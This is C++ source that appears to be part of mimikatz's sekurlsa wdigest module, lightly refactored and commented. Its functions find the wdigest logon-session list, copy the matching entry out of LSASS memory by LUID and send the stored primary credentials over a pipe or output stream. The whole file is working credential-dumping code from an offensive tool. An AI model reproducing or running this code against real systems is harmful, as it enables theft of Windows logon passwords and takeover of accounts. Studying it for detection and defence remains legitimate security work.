__kextdll bool __cdecl getWDigestFunctions(mod_pipe * monPipe, vector<wstring> * mesArguments)
{
	// Reports whether the wdigest logon-session list could be located, then
	// echoes the two addresses the wdigest module works with, and ships the
	// text back over monPipe. mesArguments is accepted but not consulted.
	// The search runs first so that the globals printed below reflect its
	// outcome (presumably searchWDigestEntryList() is what fills them — confirm).
	const bool entryListFound = searchWDigestEntryList();

	wostringstream report;
	report << L"** wdigest.dll/lsasrv.dll ** ; Research Status : ";
	if(entryListFound)
		report << L"OK :)";
	else
		report << L"KO :(";
	report << endl << endl;
	report << L"@l_LogSessList      = " << l_LogSessList << endl;
	// LsaUnprotectMemory is taken from the LSA function table; its role here is
	// only to be displayed.
	report << L"@LsaUnprotectMemory = " << SeckPkgFunctionTable->LsaUnprotectMemory << endl;

	return sendTo(monPipe, report.str());
}
bool WINAPI getWDigestLogonData(__in PLUID logId, __in mod_pipe * monPipe, __in bool justSecurity)
{
	// Finds the wdigest logon session whose LUID equals logId and streams its
	// generic primary credential (via genericCredsToStream) back over monPipe.
	// When the session list cannot be located the reply is a fixed "n.a." marker.
	// Returns whatever sendTo() returns.
	wostringstream reply;

	if(!searchWDigestEntryList())
	{
		reply << L"n.a. (wdigest KO)";
		return sendTo(monPipe, reply.str());
	}

	PKIWI_GENERIC_PRIMARY_CREDENTIAL creds = NULL;
	PKIWI_WDIGEST_LIST_ENTRY session = reinterpret_cast<PKIWI_WDIGEST_LIST_ENTRY>(
		getPtrFromLinkedListByLuid(reinterpret_cast<PLIST_ENTRY>(l_LogSessList),
		                           FIELD_OFFSET(KIWI_WDIGEST_LIST_ENTRY, LocallyUniqueIdentifier),
		                           logId));
	if(session)
	{
		// The credential block sits offsetWDigestPrimary bytes past the list
		// entry (offset presumably chosen per OS build elsewhere — confirm).
		PBYTE sessionBytes = reinterpret_cast<PBYTE>(session);
		creds = reinterpret_cast<PKIWI_GENERIC_PRIMARY_CREDENTIAL>(sessionBytes + offsetWDigestPrimary);
	}

	// creds stays NULL when no session matches logId; genericCredsToStream is
	// handed it unchanged, as in the rest of the module.
	genericCredsToStream(&reply, creds, justSecurity);
	return sendTo(monPipe, reply.str());
}
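bool WINAPI mod_mimikatz_sekurlsa_wdigest::getWDigestLogonData(__in PLUID logId, __in bool justSecurity)
{
	// Copies the wdigest logon-session entry matching logId out of the target
	// process (mod_mimikatz_sekurlsa::hLSASS — presumably an LSASS handle, so
	// this is credential extraction from another process) and streams its
	// generic primary credential to *outputStream.
	// Always returns true; a session that is not found or cannot be read is
	// reported by passing a NULL credential to genericCredsToStream.
	if(!searchWDigestEntryList())
	{
		(*outputStream) << L"n.a. (wdigest KO)";
		return true;
	}

	// Owns the local scratch copy of the remote entry so that it is released on
	// every exit path — the previous explicit delete[] was skipped if
	// genericCredsToStream threw.
	struct ScopedBuffer
	{
		BYTE * bytes;
		explicit ScopedBuffer(DWORD size) : bytes(new BYTE[size]) {}
		~ScopedBuffer() { delete [] bytes; }
	private:
		ScopedBuffer(const ScopedBuffer &);
		ScopedBuffer & operator=(const ScopedBuffer &);
	};

	// Read just enough of the entry to cover the credential block that lives
	// offsetWDigestPrimary bytes past the list head.
	const DWORD taille = offsetWDigestPrimary + sizeof(KIWI_GENERIC_PRIMARY_CREDENTIAL);
	ScopedBuffer monBuff(taille);

	PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCreds = NULL;
	if(PLIST_ENTRY pLogSession = mod_mimikatz_sekurlsa::getPtrFromLinkedListByLuid(reinterpret_cast<PLIST_ENTRY>(l_LogSessList), FIELD_OFFSET(KIWI_WDIGEST_LIST_ENTRY, LocallyUniqueIdentifier), logId))
	{
		if(mod_memory::readMemory(pLogSession, monBuff.bytes, taille, mod_mimikatz_sekurlsa::hLSASS))
			mesCreds = reinterpret_cast<PKIWI_GENERIC_PRIMARY_CREDENTIAL>(monBuff.bytes + offsetWDigestPrimary);
	}

	// Only the struct itself has been copied locally; any pointers it contains
	// still refer to the remote address space (presumably genericCredsToStream
	// re-reads them through hLSASS — confirm before dereferencing here).
	mod_mimikatz_sekurlsa::genericCredsToStream(mesCreds, justSecurity);
	return true;
}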